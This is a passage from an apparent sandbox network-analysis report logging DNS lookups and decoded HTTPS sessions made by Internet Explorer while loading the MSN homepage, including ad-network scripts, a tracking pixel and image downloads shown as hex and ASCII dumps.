Dec 3, 2021 00:42:37.103295088 CET	192.168.2.5	8.8.8.8	0xc9d	Standard query (0)	assets.msn.com	A (IP address)	IN (0x0001)
Dec 3, 2021 00:42:37.382968903 CET	192.168.2.5	8.8.8.8	0xcb75	Standard query (0)	btloader.com	A (IP address)	IN (0x0001)
Dec 3, 2021 00:42:40.976524115 CET	192.168.2.5	8.8.8.8	0x527d	Standard query (0)	ad.doubleclick.net	A (IP address)	IN (0x0001)
Dec 3, 2021 00:42:40.982070923 CET	192.168.2.5	8.8.8.8	0x4147	Standard query (0)	ad-delivery.net	A (IP address)	IN (0x0001)
Dec 3, 2021 00:42:41.275290966 CET	192.168.2.5	8.8.8.8	0x54b	Standard query (0)	srtb.msn.com	A (IP address)	IN (0x0001)
Dec 3, 2021 00:42:43.497526884 CET	192.168.2.5	8.8.8.8	0x5f47	Standard query (0)	img.img-taboola.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Dec 3, 2021 00:42:23.557391882 CET	8.8.8.8	192.168.2.5	0x1030	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)
Dec 3, 2021 00:42:29.051316977 CET	8.8.8.8	192.168.2.5	0xee31	No error (0)	browser.events.data.msn.com	global.asimov.events.data.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)
Dec 3, 2021 00:42:29.661101103 CET	8.8.8.8	192.168.2.5	0xc0d6	No error (0)	contextual.media.net		23.211.6.95	A (IP address)	IN (0x0001)
Dec 3, 2021 00:42:32.020353079 CET	8.8.8.8	192.168.2.5	0x2c8f	No error (0)	lg3.media.net		23.211.6.95	A (IP address)	IN (0x0001)
Dec 3, 2021 00:42:32.884354115 CET	8.8.8.8	192.168.2.5	0xbf8e	No error (0)	hblg.media.net		23.211.6.95	A (IP address)	IN (0x0001)
Dec 3, 2021 00:42:37.088140011 CET	8.8.8.8	192.168.2.5	0x380c	No error (0)	cvision.media.net	cvision.media.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)
Dec 3, 2021 00:42:37.124667883 CET	8.8.8.8	192.168.2.5	0xc9d	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)
Dec 3, 2021 00:42:37.402966022 CET	8.8.8.8	192.168.2.5	0xcb75	No error (0)	btloader.com		104.26.7.139	A (IP address)	IN (0x0001)
Dec 3, 2021 00:42:37.402966022 CET	8.8.8.8	192.168.2.5	0xcb75	No error (0)	btloader.com		104.26.6.139	A (IP address)	IN (0x0001)
Dec 3, 2021 00:42:37.402966022 CET	8.8.8.8	192.168.2.5	0xcb75	No error (0)	btloader.com		172.67.70.134	A (IP address)	IN (0x0001)
Dec 3, 2021 00:42:41.004554987 CET	8.8.8.8	192.168.2.5	0x4147	No error (0)	ad-delivery.net		104.26.3.70	A (IP address)	IN (0x0001)
Dec 3, 2021 00:42:41.004554987 CET	8.8.8.8	192.168.2.5	0x4147	No error (0)	ad-delivery.net		172.67.69.19	A (IP address)	IN (0x0001)
Dec 3, 2021 00:42:41.004554987 CET	8.8.8.8	192.168.2.5	0x4147	No error (0)	ad-delivery.net		104.26.2.70	A (IP address)	IN (0x0001)
Dec 3, 2021 00:42:41.004832029 CET	8.8.8.8	192.168.2.5	0x527d	No error (0)	ad.doubleclick.net	dart.l.doubleclick.net		CNAME (Canonical name)	IN (0x0001)
Dec 3, 2021 00:42:41.004832029 CET	8.8.8.8	192.168.2.5	0x527d	No error (0)	dart.l.doubleclick.net		142.250.203.102	A (IP address)	IN (0x0001)
Dec 3, 2021 00:42:41.295137882 CET	8.8.8.8	192.168.2.5	0x54b	No error (0)	srtb.msn.com	www.msn.com		CNAME (Canonical name)	IN (0x0001)
Dec 3, 2021 00:42:41.295137882 CET	8.8.8.8	192.168.2.5	0x54b	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)
Dec 3, 2021 00:42:43.516705036 CET	8.8.8.8	192.168.2.5	0x5f47	No error (0)	img.img-taboola.com	tls13.taboola.map.fastly.net		CNAME (Canonical name)	IN (0x0001)
Dec 3, 2021 00:42:43.516705036 CET	8.8.8.8	192.168.2.5	0x5f47	No error (0)	tls13.taboola.map.fastly.net		151.101.1.44	A (IP address)	IN (0x0001)
Dec 3, 2021 00:42:43.516705036 CET	8.8.8.8	192.168.2.5	0x5f47	No error (0)	tls13.taboola.map.fastly.net		151.101.65.44	A (IP address)	IN (0x0001)
Dec 3, 2021 00:42:43.516705036 CET	8.8.8.8	192.168.2.5	0x5f47	No error (0)	tls13.taboola.map.fastly.net		151.101.129.44	A (IP address)	IN (0x0001)
Dec 3, 2021 00:42:43.516705036 CET	8.8.8.8	192.168.2.5	0x5f47	No error (0)	tls13.taboola.map.fastly.net		151.101.193.44	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

https:

btloader.com

ad-delivery.net

ad.doubleclick.net

img.img-taboola.com

172.104.227.98

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49812	104.26.7.139	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-02 23:42:37 UTC	0	OUT	GET /tag?o=6208086025961472&upapi=true HTTP/1.1 Accept: application/javascript, /;q=0.8 Referer: https://www.msn.com/de-ch/?ocid=iehp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: btloader.com Connection: Keep-Alive
2021-12-02 23:42:37 UTC	0	IN	HTTP/1.1 200 OK Date: Thu, 02 Dec 2021 23:42:37 GMT Content-Type: application/javascript Content-Length: 10228 Connection: close Cache-Control: public, max-age=1800, must-revalidate Etag: "9797e32e55e3f8093ab50fb8720d0aa7" Vary: Origin Via: 1.1 google CF-Cache-Status: HIT Age: 1592 Accept-Ranges: bytes Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=g94iuGazlldNIoVnZWAZNx7GKAaes2CR7qy62tnQlTXD0dxP5KF1RUnWy%2FH4QdveAcfTUHur1%2BvqxzGkJI8bwRngBdkkjlTSZiev7lfZ4GArTsOKNx3XJ80x93zqLw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6b7869ac4e7d2b89-FRA
2021-12-02 23:42:37 UTC	1	IN	Data Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 69 2c 63 2c 6c 29 7b 72 65 74 75 72 6e 20 6e 65 77 28 63 3d 63 7c 7c 50 72 6f 6d 69 73 65 29 28 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 74 72 79 7b 72 28 6c 2e 6e 65 78 74 28 65 29 29 7d 63 61 74 63 68 28 65 29 7b 74 28 65 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 74 72 79 7b 72 28 6c 2e 74 68 72 6f 77 28 65 29 29 7d 63 61 74 63 68 28 65 29 7b 74 28 65 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 72 28 65 29 7b 76 61 72 20 74 3b 65 2e 64 6f 6e 65 3f 6e 28 65 2e 76 61 6c 75 65 29 3a 28 28 74 3d 65 2e 76 61 6c 75 65 29 69 6e 73 74 61 6e 63 65 6f 66 20 63 3f 74 3a 6e 65 77 20 63 28 66 75 6e 63 74 69 6f Data Ascii: !function(){"use strict";function r(e,i,c,l){return new(c=c\|\|Promise)(function(n,t){function o(e){try{r(l.next(e))}catch(e){t(e)}}function a(e){try{r(l.throw(e))}catch(e){t(e)}}function r(e){var t;e.done?n(e.value):((t=e.value)instanceof c?t:new c(functio
2021-12-02 23:42:37 UTC	1	IN	Data Raw: 6f 6e 28 74 29 7b 69 66 28 61 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 47 65 6e 65 72 61 74 6f 72 20 69 73 20 61 6c 72 65 61 64 79 20 65 78 65 63 75 74 69 6e 67 2e 22 29 3b 66 6f 72 28 3b 63 3b 29 74 72 79 7b 69 66 28 61 3d 31 2c 72 26 26 28 69 3d 32 26 74 5b 30 5d 3f 72 2e 72 65 74 75 72 6e 3a 74 5b 30 5d 3f 72 2e 74 68 72 6f 77 7c 7c 28 28 69 3d 72 2e 72 65 74 75 72 6e 29 26 26 69 2e 63 61 6c 6c 28 72 29 2c 30 29 3a 72 2e 6e 65 78 74 29 26 26 21 28 69 3d 69 2e 63 61 6c 6c 28 72 2c 74 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 69 3b 73 77 69 74 63 68 28 72 3d 30 2c 69 26 26 28 74 3d 5b 32 26 74 5b 30 5d 2c 69 2e 76 61 6c 75 65 5d 29 2c 74 5b 30 5d 29 7b 63 61 73 65 20 30 3a 63 61 73 65 20 31 3a 69 3d 74 3b 62 72 65 61 Data Ascii: on(t){if(a)throw new TypeError("Generator is already executing.");for(;c;)try{if(a=1,r&&(i=2&t[0]?r.return:t[0]?r.throw\|\|((i=r.return)&&i.call(r),0):r.next)&&!(i=i.call(r,t[1])).done)return i;switch(r=0,i&&(t=[2&t[0],i.value]),t[0]){case 0:case 1:i=t;brea
2021-12-02 23:42:37 UTC	2	IN	Data Raw: 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 7d 29 7d 76 61 72 20 75 2c 61 2c 64 2c 62 2c 6d 3b 75 3d 22 36 32 30 38 30 38 36 30 32 35 39 36 31 34 37 32 22 2c 61 3d 22 62 74 6c 6f 61 64 65 72 2e 63 6f 6d 22 2c 64 3d 22 61 70 69 2e 62 74 6c 6f 61 64 65 72 2e 63 6f 6d 22 2c 62 3d 22 32 2e 30 2e 32 2d 32 2d 67 66 64 63 39 30 35 34 22 2c 6d 3d 22 22 3b 76 61 72 20 6f 3d 7b 22 6d 73 6e 2e 63 6f 6d 22 3a 7b 22 63 6f 6e 74 65 6e 74 5f 65 6e 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 6d 6f 62 69 6c 65 5f 63 6f 6e 74 65 6e 74 5f 65 6e 61 62 6c 65 64 22 3a 66 61 6c 73 65 2c 22 77 65 62 73 69 74 65 5f 69 64 22 3a 22 35 36 37 31 37 33 37 33 38 38 36 39 35 35 35 32 22 7d 7d 2c 77 3d 7b 74 72 61 63 65 49 44 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 69 66 28 21 65 7c Data Ascii: appendChild(e)})}var u,a,d,b,m;u="6208086025961472",a="btloader.com",d="api.btloader.com",b="2.0.2-2-gfdc9054",m="";var o={"msn.com":{"content_enabled":true,"mobile_content_enabled":false,"website_id":"5671737388695552"}},w={traceID:function(e,t,n){if(!e\|
2021-12-02 23:42:37 UTC	4	IN	Data Raw: 62 73 69 74 65 49 44 3d 6f 5b 6e 5d 2e 77 65 62 73 69 74 65 5f 69 64 2c 70 2e 63 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 3d 6f 5b 6e 5d 2e 63 6f 6e 74 65 6e 74 5f 65 6e 61 62 6c 65 64 2c 70 2e 6d 6f 62 69 6c 65 43 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 3d 6f 5b 6e 5d 2e 6d 6f 62 69 6c 65 5f 63 6f 6e 74 65 6e 74 5f 65 6e 61 62 6c 65 64 29 3b 74 7c 7c 28 28 6e 65 77 20 49 6d 61 67 65 29 2e 73 72 63 3d 22 2f 2f 22 2b 64 2b 22 2f 6c 3f 65 76 65 6e 74 3d 75 6e 6b 6e 6f 77 6e 44 6f 6d 61 69 6e 26 6f 72 67 3d 22 2b 75 2b 22 26 64 6f 6d 61 69 6e 3d 22 2b 65 29 7d 28 29 2c 77 69 6e 64 6f 77 2e 5f 5f 62 74 5f 74 61 67 5f 64 3d 7b 6f 72 67 49 44 3a 75 2c 64 6f 6d 61 69 6e 3a 61 2c 61 70 69 44 6f 6d 61 69 6e 3a 64 2c 76 65 72 73 69 6f 6e 3a 62 2c 77 65 62 73 69 74 65 Data Ascii: bsiteID=o[n].website_id,p.contentEnabled=o[n].content_enabled,p.mobileContentEnabled=o[n].mobile_content_enabled);t\|\|((new Image).src="//"+d+"/l?event=unknownDomain&org="+u+"&domain="+e)}(),window.__bt_tag_d={orgID:u,domain:a,apiDomain:d,version:b,website
2021-12-02 23:42:37 UTC	5	IN	Data Raw: 61 74 68 2e 74 72 75 6e 63 28 31 30 30 2a 28 2b 6f 2b 30 29 29 2c 6d 61 78 3a 4d 61 74 68 2e 74 72 75 6e 63 28 31 30 30 2a 28 2b 6f 2b 30 2b 74 29 29 7d 2c 6f 2b 3d 74 7d 29 7d 76 61 72 20 6c 3d 74 5b 30 5d 3b 69 66 28 6e 75 6c 6c 21 3d 6c 26 26 6c 2e 62 75 6e 64 6c 65 73 29 7b 76 61 72 20 73 3d 6f 2c 75 3d 31 2d 6f 3b 4f 62 6a 65 63 74 2e 6b 65 79 73 28 6c 2e 62 75 6e 64 6c 65 73 29 2e 73 6f 72 74 28 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 6c 2e 62 75 6e 64 6c 65 73 5b 65 5d 3b 69 5b 65 5d 3d 7b 6d 69 6e 3a 4d 61 74 68 2e 74 72 75 6e 63 28 31 30 30 2a 28 73 2b 75 2a 61 29 29 2c 6d 61 78 3a 4d 61 74 68 2e 74 72 75 6e 63 28 31 30 30 2a 28 73 2b 75 2a 28 61 2b 74 29 29 29 7d 2c 61 2b 3d 74 7d 29 7d 76 61 72 20 64 Data Ascii: ath.trunc(100(+o+0)),max:Math.trunc(100(+o+0+t))},o+=t})}var l=t[0];if(null!=l&&l.bundles){var s=o,u=1-o;Object.keys(l.bundles).sort().forEach(function(e){var t=l.bundles[e];i[e]={min:Math.trunc(100(s+ua)),max:Math.trunc(100(s+u(a+t)))},a+=t})}var d
2021-12-02 23:42:37 UTC	7	IN	Data Raw: 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 43 75 73 74 6f 6d 45 76 65 6e 74 22 29 3b 61 2e 69 6e 69 74 43 75 73 74 6f 6d 45 76 65 6e 74 28 74 2c 6e 2e 62 75 62 62 6c 65 73 2c 6e 2e 63 61 6e 63 65 6c 61 62 6c 65 2c 6e 2e 64 65 74 61 69 6c 29 2c 77 69 6e 64 6f 77 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 61 29 7d 66 3d 7b 22 67 6c 6f 62 61 6c 22 3a 7b 22 64 69 67 65 73 74 22 3a 35 37 31 32 39 37 33 31 32 34 33 33 37 36 36 34 2c 22 62 75 6e 64 6c 65 73 22 3a 7b 22 35 37 31 32 39 37 33 31 32 34 33 33 37 36 36 34 22 3a 30 2e 35 7d 7d 7d 2c 77 69 6e 64 6f 77 2e 5f 5f 62 74 5f 69 6e 74 72 6e 6c 3d 7b 74 72 61 63 65 49 44 3a 77 2e 74 72 61 63 65 49 44 7d 3b 74 72 79 7b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 72 28 74 68 69 73 2c 76 Data Ascii: a=document.createEvent("CustomEvent");a.initCustomEvent(t,n.bubbles,n.cancelable,n.detail),window.dispatchEvent(a)}f={"global":{"digest":5712973124337664,"bundles":{"5712973124337664":0.5}}},window.__bt_intrnl={traceID:w.traceID};try{!function(){r(this,v
2021-12-02 23:42:37 UTC	8	IN	Data Raw: 22 74 72 75 65 22 3d 3d 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 66 6f 72 63 65 43 6f 6e 74 65 6e 74 22 29 7c 7c 70 2e 63 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 2c 70 2e 6d 6f 62 69 6c 65 43 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 3d 22 74 72 75 65 22 3d 3d 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 66 6f 72 63 65 4d 6f 62 69 6c 65 43 6f 6e 74 65 6e 74 22 29 7c 7c 70 2e 6d 6f 62 69 6c 65 43 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 29 2c 70 2e 77 65 62 73 69 74 65 49 44 26 26 70 2e 63 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 26 26 28 21 28 6e 3d 2f 28 61 6e 64 72 6f 69 64 7c 62 62 5c 64 2b 7c 6d 65 65 67 6f 29 2e 2b 6d 6f 62 69 6c 65 7c 61 76 61 6e 74 67 6f 7c 62 61 64 61 5c 2f 7c 62 6c 61 63 6b 62 65 72 72 79 7c Data Ascii: "true"==localStorage.getItem("forceContent")\|\|p.contentEnabled,p.mobileContentEnabled="true"==localStorage.getItem("forceMobileContent")\|\|p.mobileContentEnabled),p.websiteID&&p.contentEnabled&&(!(n=/(android\|bb\d+\|meego).+mobile\|avantgo\|bada\/\|blackberry\|
2021-12-02 23:42:37 UTC	9	IN	Data Raw: 30 31 7c 32 31 7c 63 61 29 7c 6d 5c 2d 63 72 7c 6d 65 28 72 63 7c 72 69 29 7c 6d 69 28 6f 38 7c 6f 61 7c 74 73 29 7c 6d 6d 65 66 7c 6d 6f 28 30 31 7c 30 32 7c 62 69 7c 64 65 7c 64 6f 7c 74 28 5c 2d 7c 20 7c 6f 7c 76 29 7c 7a 7a 29 7c 6d 74 28 35 30 7c 70 31 7c 76 20 29 7c 6d 77 62 70 7c 6d 79 77 61 7c 6e 31 30 5b 30 2d 32 5d 7c 6e 32 30 5b 32 2d 33 5d 7c 6e 33 30 28 30 7c 32 29 7c 6e 35 30 28 30 7c 32 7c 35 29 7c 6e 37 28 30 28 30 7c 31 29 7c 31 30 29 7c 6e 65 28 28 63 7c 6d 29 5c 2d 7c 6f 6e 7c 74 66 7c 77 66 7c 77 67 7c 77 74 29 7c 6e 6f 6b 28 36 7c 69 29 7c 6e 7a 70 68 7c 6f 32 69 6d 7c 6f 70 28 74 69 7c 77 76 29 7c 6f 72 61 6e 7c 6f 77 67 31 7c 70 38 30 30 7c 70 61 6e 28 61 7c 64 7c 74 29 7c 70 64 78 67 7c 70 67 28 31 33 7c 5c 2d 28 5b 31 2d 38 5d 7c Data Ascii: 01\|21\|ca)\|m\-cr\|me(rc\|ri)\|mi(o8\|oa\|ts)\|mmef\|mo(01\|02\|bi\|de\|do\|t(\-\| \|o\|v)\|zz)\|mt(50\|p1\|v )\|mwbp\|mywa\|n10[0-2]\|n20[2-3]\|n30(0\|2)\|n50(0\|2\|5)\|n7(0(0\|1)\|10)\|ne((c\|m)\-\|on\|tf\|wf\|wg\|wt)\|nok(6\|i)\|nzph\|o2im\|op(ti\|wv)\|oran\|owg1\|p800\|pan(a\|d\|t)\|pdxg\|pg(13\|\-([1-8]\|
2021-12-02 23:42:37 UTC	11	IN	Data Raw: 70 61 79 6c 6f 61 64 3a 7b 64 65 74 61 69 6c 3a 21 31 7d 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 72 65 74 75 72 6e 5b 32 5d 7d 7d 29 7d 29 7d 28 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 28 29 3b 0a Data Ascii: payload:{detail:!1}})}catch(e){}return[2]}})})}()}catch(e){}}();

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49823	104.26.3.70	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-02 23:42:41 UTC	11	OUT	GET /px.gif?ch=1&e=0.038705726061928736 HTTP/1.1 Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5 Referer: https://www.msn.com/de-ch/?ocid=iehp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: ad-delivery.net Connection: Keep-Alive
2021-12-02 23:42:41 UTC	13	IN	HTTP/1.1 200 OK Date: Thu, 02 Dec 2021 23:42:41 GMT Content-Type: image/gif Content-Length: 43 Connection: close X-GUploader-UploadID: ABg5-UzSZ-Kt1WbGdd88HlCnZf7YcJGLu-DR5tPwPS9bXoxAsvJYwt4jGn6LAHoZbG34sctt0vecv7iFCJZExLBCcbRvF7nEjw Expires: Thu, 02 Dec 2021 23:53:27 GMT Last-Modified: Wed, 05 May 2021 19:25:32 GMT ETag: "ad4b0f606e0f8465bc4c4c170b37e1a3" x-goog-generation: 1620242732037093 x-goog-metageneration: 5 x-goog-stored-content-encoding: identity x-goog-stored-content-length: 43 x-goog-hash: crc32c=cpEfJQ== x-goog-hash: md5=rUsPYG4PhGW8TEwXCzfhow== x-goog-storage-class: MULTI_REGIONAL Access-Control-Allow-Origin: * Access-Control-Expose-Headers: *, Content-Length, Date, Server, Transfer-Encoding, X-GUploader-UploadID, X-Google-Trace Age: 477 Cache-Control: public, max-age=86400 CF-Cache-Status: HIT Accept-Ranges: bytes Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tOy8HsQoF3YDfnbmpybMQr7VPLq7bBJAw8bO6J27mQZEozExeMfo%2FqMTJamEgRVORNYYZ4LlJY%2FFERCSGZZLLgFHzVvok%2BOwE0qSVKFNXbeKZU19pra%2FBYU5kW7KnVmnhw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6b7869c319904aaf-FRA
2021-12-02 23:42:41 UTC	15	IN	Data Raw: 47 49 46 38 39 61 01 00 01 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 00 Data Ascii: GIF89a!
2021-12-02 23:42:41 UTC	15	IN	Data Raw: 01 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b Data Ascii: ,L;

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49825	142.250.203.102	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-02 23:42:41 UTC	11	OUT	GET /favicon.ico?ad=300x250&ad_box_=1&adnet=1&showad=1&size=250x250 HTTP/1.1 Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5 Referer: https://www.msn.com/de-ch/?ocid=iehp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: ad.doubleclick.net Connection: Keep-Alive
2021-12-02 23:42:41 UTC	11	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Vary: Accept-Encoding Content-Type: image/x-icon Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="ads-doubleclick-media" Report-To: {"group":"ads-doubleclick-media","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/ads-doubleclick-media"}]} Content-Length: 1078 Date: Thu, 02 Dec 2021 14:04:32 GMT Expires: Fri, 03 Dec 2021 14:04:32 GMT Last-Modified: Tue, 08 May 2012 13:08:06 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Age: 34689 Cache-Control: public, max-age=86400 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close
2021-12-02 23:42:41 UTC	12	IN	Data Raw: 00 00 01 00 02 00 10 10 10 00 00 00 00 00 28 01 00 00 26 00 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 4e 01 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 04 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 Data Ascii: (& N(
2021-12-02 23:42:41 UTC	13	IN	Data Raw: 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.5	49834	151.101.1.44	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-02 23:42:43 UTC	15	OUT	GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fd3afd4e88e658af134b18abda7a3ae2a.jpg HTTP/1.1 Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5 Referer: https://www.msn.com/de-ch/?ocid=iehp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: img.img-taboola.com Connection: Keep-Alive
2021-12-02 23:42:43 UTC	16	IN	HTTP/1.1 200 OK Connection: close Content-Length: 14685 Server: nginx Content-Type: image/jpeg access-control-allow-headers: X-Requested-With access-control-allow-origin: * edge-cache-tag: 540279164799566712583557572357803464924,335819361778233258019105610798549877581,29ecf9b93bbf306179626feeda1fab70 etag: "0df2da0f8682207643efe54e051b3255" expiration: expiry-date="Sat, 27 Nov 2021 00:00:00 GMT", rule-id="delete fetch for taboola after 30 days" last-modified: Wed, 27 Oct 2021 05:35:29 GMT timing-allow-origin: * x-ratelimit-limit: 101 x-ratelimit-remaining: 100 x-ratelimit-reset: 1 x-envoy-upstream-service-time: 212 X-backend-name: LA_DIR:3FP7YNX3LMizprTZsG7BSW--F_LA_nlb202 Via: 1.1 varnish, 1.1 varnish Cache-Control: public, max-age=31536000 Accept-Ranges: bytes Date: Thu, 02 Dec 2021 23:42:43 GMT Age: 1062123 X-Served-By: cache-dca17767-DCA, cache-dca17739-DCA, cache-mxp6949-MXP X-Cache: MISS, HIT, HIT X-Cache-Hits: 0, 1, 1 X-Timer: S1638488564.615988,VS0,VE1 Vary: ImageFormat X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fd3afd4e88e658af134b18abda7a3ae2a.jpg X-vcl-time-ms: 1
2021-12-02 23:42:43 UTC	17	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 03 03 03 03 03 03 04 04 04 04 05 05 05 05 05 07 07 06 06 07 07 0b 08 09 08 09 08 0b 11 0b 0c 0b 0b 0c 0b 11 0f 12 0f 0e 0f 12 0f 1b 15 13 13 15 1b 1f 1a 19 1a 1f 26 22 22 26 30 2d 30 3e 3e 54 01 03 03 03 03 03 03 04 04 04 04 05 05 05 05 05 07 07 06 06 07 07 0b 08 09 08 09 08 0b 11 0b 0c 0b 0b 0c 0b 11 0f 12 0f 0e 0f 12 0f 1b 15 13 13 15 1b 1f 1a 19 1a 1f 26 22 22 26 30 2d 30 3e 3e 54 ff c2 00 11 08 01 37 00 cf 03 01 22 00 02 11 01 03 11 01 ff c4 00 36 00 00 01 04 03 01 01 01 00 00 00 00 00 00 00 00 00 00 05 06 07 08 03 04 09 02 01 0a 01 00 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 02 03 04 01 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 ea 98 00 00 00 00 00 00 00 00 00 00 Data Ascii: 